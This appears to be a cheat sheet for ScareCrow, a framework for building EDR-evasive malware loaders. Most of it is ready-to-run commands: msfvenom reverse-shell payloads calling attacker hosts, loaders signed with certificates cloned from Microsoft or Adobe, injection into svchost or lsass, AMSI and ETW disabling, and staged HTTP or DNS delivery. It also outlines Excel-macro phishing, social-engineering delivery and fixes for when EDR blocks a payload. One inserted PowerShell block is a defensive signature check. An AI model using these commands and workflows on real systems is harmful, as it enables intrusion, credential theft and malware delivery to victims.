
ScareCrow

ScareCrow is a powerful payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.

Installation

Prerequisites

# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go

# On macOS
brew install mingw-w64 osslsigncode openssl go

# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golang

Build from Source

# Clone ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow

# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go

# Verify installation
./ScareCrow -h

Quick Install via Go

# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest

# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/bin

Quick Start

Generate a basic loader from msfvenom shellcode:

# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin

# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http

# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)

Loader Types

Type        | Flag             | Description                     | Best For
------------|------------------|---------------------------------|----------------------------------------
Binary      | -Loader binary   | Standalone executable           | Direct execution, reverse shells
DLL         | -Loader dll      | Dynamic library for sideloading | DLL injection, process hollowing
COM Object  | -Loader control  | COM control object (.scr)       | Screensaver execution, UAC bypass
Excel Macro | -Loader excel    | Excel-based delivery            | Phishing documents, macro execution
MSIExec     | -Loader msiexec  | Windows Installer wrapper       | Code execution via MSI, UAC bypass
WScript     | -Loader wscript  | Windows Script Host wrapper     | VBScript/JScript execution, LOLBin abuse

DLL Side-Loading Example

# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http

# Use legitimate application to load malicious DLL
# Place loader.dll next to legitimate application
# When legitimate app runs, it loads our malicious DLL

Excel Macro Delivery

# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# Creates VBA macro that executes loader
# Can be embedded in .xls/.xlsm documents

Input Formats

Raw Shellcode Input

# Using -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com

# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.bin

Metasploit Integration

# Generate shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
  -f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com

# For 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
  -f raw > x86.bin && ./ScareCrow -I x86.bin

Cobalt Strike Shellcode

# Export from Cobalt Strike beacon
# Generate raw shellcode from beacon export

./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery http

Code Signing

Domain-Based Certificate Cloning

# Sign with cloned certificate from domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365

# ScareCrow clones legitimate certificate from specified domain
# Creates trusted signature that bypasses SmartScreen

# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.com

Certificate Options

# Sign without specific domain (self-signed)
./ScareCrow -I payload.bin

# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90

# Use custom certificate (if available)
./ScareCrow -I payload.bin -domain company.com

Why Code Signing Matters

Signed loaders bypass numerous defenses:

  • SmartScreen warning suppression
  • Code signature validation in EDRs
  • Windows Defender Application Guard bypass
  • Trust indicators in file properties
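A defender-side check of the signing claim above, added here as an example and not part of ScareCrow or this page: a certificate cloned from a domain copies that domain's subject fields but is self-signed, so it does not chain to a root in the machine's trust store, and Get-AuthenticodeSignature reports that. The file path is a placeholder.

```powershell
# Added example (not ScareCrow code): inspect a PE file's Authenticode signature
# to see whether the signer actually chains to a trusted root or is only a
# self-signed certificate whose subject imitates a well-known vendor.
$path = 'C:\samples\loader.exe'   # placeholder path; any PE file to examine

$sig = Get-AuthenticodeSignature -FilePath $path

# Status is 'Valid' only when the chain terminates in a root the machine trusts.
# A cloned/self-signed certificate yields 'UnknownError' (untrusted root) even
# though the Subject reads like a real vendor. Unsigned files report 'NotSigned'.
[pscustomobject]@{
    File          = $path
    Status        = $sig.Status
    StatusMessage = $sig.StatusMessage
    Subject       = $sig.SignerCertificate.Subject
    Issuer        = $sig.SignerCertificate.Issuer
    SelfSigned    = ($sig.SignerCertificate -and
                     $sig.SignerCertificate.Subject -eq $sig.SignerCertificate.Issuer)
    NotAfter      = $sig.SignerCertificate.NotAfter
}

# Flag the combination worth triaging: a signature is present, looks like a
# vendor certificate, but the chain is not trusted. Treat such a file as unsigned.
if ($sig.SignerCertificate -and $sig.Status -ne 'Valid') {
    Write-Warning "Signature present but untrusted ($($sig.Status)): treat $path as unsigned."
}
```

SmartScreen reputation is a separate mechanism from chain validation, so a file that passes this check can still be unknown to SmartScreen, and one that fails it should never be treated as trusted.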

Encryption

Encryption Modes

# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XOR

File Size Comparison

# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XOR

Process Injection

Injection Techniques

# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com

# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe

# Target specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exe

Process Injection Tactics

# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com

# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.com

Process Selection Tips

  • svchost.exe - System service host (trusted)
  • taskhostw.exe - Task Scheduler host (legitimate)
  • explorer.exe - Windows Explorer (common)
  • winlogon.exe - Logon process (high privilege)
  • lsass.exe - Local Security Authority (protected)

Delivery Options

HTTP Delivery

# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
  -domain microsoft.com

# Staged delivery - loader downloads payload from URL
./ScareCrow -I payload.bin -delivery http

DNS Delivery

# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com

# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructure

URL-Based Delivery

# Specify custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
  -delivery http -domain microsoft.com

# File will be downloaded from specified URL at runtime

No Internet Delivery

# Embed payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com

# Useful for offline or isolated environments

EDR Evasion Techniques

ETW (Event Tracing for Windows) Patching

# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw

# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rules

AMSI Bypass

# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi

# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloads

Sleep Obfuscation

# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep

# Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patterns

Combined Evasion

# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
  -noetw -noamsi -nosleep -encryptionmode AES

# Combines multiple evasion techniques
# Most effective against modern EDR solutions

Additional Evasion

  • Direct syscall execution (bypasses hooked APIs)
  • Unhooking kernel32 functions
  • Hardware breakpoint detection bypass
  • Sandbox evasion checks
  • Timing-based detection avoidance

Advanced Options

Custom Passwords

# Use custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com

# Password-protects the generated loader

Console Output Control

# Show console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com

# Hide console (default for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.com

Sandbox Evasion

# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com

# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMU

File Output Control

# Specify custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com

# Change output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.com

Complete Workflow Examples

Cobalt Strike Integration

# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin

# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
  -injection process -process svchost.exe -noetw -noamsi

# 3. Host on web server
# Place loader.exe on HTTP server

# 4. Deliver via social engineering
# Email, USB, shared drive, etc.

Sliver Integration

# 1. Generate Sliver implant shellcode
sliver > generate --mtls localhost --format shellcode > sliver.bin

# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
  -injection self -noetw

# 3. Execute on target
# ./loader.exe (connects back to Sliver server)

Metasploit Multi-Stage

# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
  LPORT=4444 -f raw > msfvenom.bin

# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
  -injection process -process explorer.exe -nosleep

# 3. Set up Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploit

Excel-Based Phishing

# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# 2. Create Excel document
# Insert generated macro into Excel

# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"

Troubleshooting

Build Errors

# Missing Go installation
# Solution: Install Go 1.16+ from golang.org

# Cannot find mingw-w64
# Solution: apt-get install mingw-w64

# openssl not found
# Solution: apt-get install openssl

Compilation Failures

# "Invalid argument" error
# Solution: Check shellcode validity - ensure raw binary format

# "Certificate error" when signing
# Solution: Verify domain is reachable, has valid certificate

# File generation issues
# Solution: Check write permissions in current directory

Payload Execution Issues

# Loader doesn't execute
# Solution: Verify shellcode format, try different injection method

# EDR blocking execution
# Solution: Enable -noetw -noamsi -nosleep flags

# Process injection fails
# Solution: Ensure target process exists, use -injection self as fallback

Size Issues

# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress

# Output binary still detected
# Solution: Recombine with fresh domain signing, change encryption mode

Best Practices

Operational Security

  • Always use code signing with legitimate-looking domains
  • Rotate domains between campaigns
  • Test payloads in isolated lab environment first
  • Monitor for detection patterns on target systems
  • Use staged delivery when network allows

Evasion Strategy

  • Combine multiple evasion techniques (-noetw, -noamsi, -nosleep)
  • Vary loader types between targets
  • Use process injection into trusted system processes
  • Implement sleep obfuscation for long-running operations
  • Test against target’s specific EDR solution

Payload Selection

  • Match shellcode size to target constraints
  • Use x64 when possible (64-bit Windows is default)
  • Consider network bandwidth for large payloads
  • Test callback connectivity before deployment
  • Plan for multiple payload attempts

Post-Exploitation

  • Monitor injected process for suspicious behavior
  • Use encrypted communications for C2
  • Implement proper logging and audit trails
  • Clean up artifacts after operation completion
  • Document all activities for IR purposes

Related Tools

Tool          | Purpose                         | Use Case
--------------|---------------------------------|-----------------------------------
Donut         | Shellcode generation from .NET  | .NET assembly execution
PEzor         | PE obfuscation and evasion      | Binary obfuscation
Freeze        | Anti-debug and anti-analysis    | Detection evasion
NimCrypt2     | Nim-based encryption            | Alternative language approach
shhhloader    | Shellcode loader framework      | Custom loader development
Sliver        | C2 framework alternative        | Command and control
Cobalt Strike | Commercial C2 framework         | Full-featured red team operations

Complementary Techniques

  • Use with Atomic Red Team for evasion testing
  • Combine with LOLBAS for execution
  • Integrate with Covenant C2 framework
  • Pair with Mimikatz for credential theft
  • Deploy alongside Empire/PowerEmpire